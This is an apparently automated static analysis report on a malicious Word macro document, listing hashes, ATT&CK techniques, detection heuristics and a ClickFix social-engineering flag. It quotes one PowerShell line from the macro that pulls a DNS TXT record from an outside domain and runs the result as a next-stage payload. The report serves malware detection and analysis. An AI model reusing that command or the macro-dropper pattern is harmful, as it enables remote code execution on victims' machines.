Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 0df2d2af779d7d28…

MALICIOUS

Office (OLE) / .DOC

12.0 KB First seen: 2023-08-09
MD5: ebb8caa9957e0984f6f38d994c7c091c SHA-1: 92f0ed5113dcf0945b20902ca2e6e82288f410bd SHA-256: 0df2d2af779d7d2818145eec503dcd564db1d6a0a1a9b2fcf2f217127f014e50
440 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File

The sample contains a VBA Auto_Open macro that utilizes WScript.Shell to execute a PowerShell command. The command 'powershell (nslookup -q=txt methew.abena-dk.cam)[-1] -NoNewWindow' suggests an attempt to resolve a TXT record from a domain and likely use the result to download and execute a further payload. The 'ClickFix' heuristic further supports the social engineering aspect of tricking the user into running commands.

Heuristics 10

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • ClickFix social engineering attack high SE_CLICKFIX
    Document instructs the user to press Win+R or paste a command into a terminal — consistent with ClickFix attacks that bypass macro restrictions by tricking users into running malicious commands directly
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
bd7c3ad0dfbf0844ea9b44572230499e5af75def410aea5c870a318d7be22887
vba-macro oletools.olevba.extract_macros (decoded VBA source) 491 bytes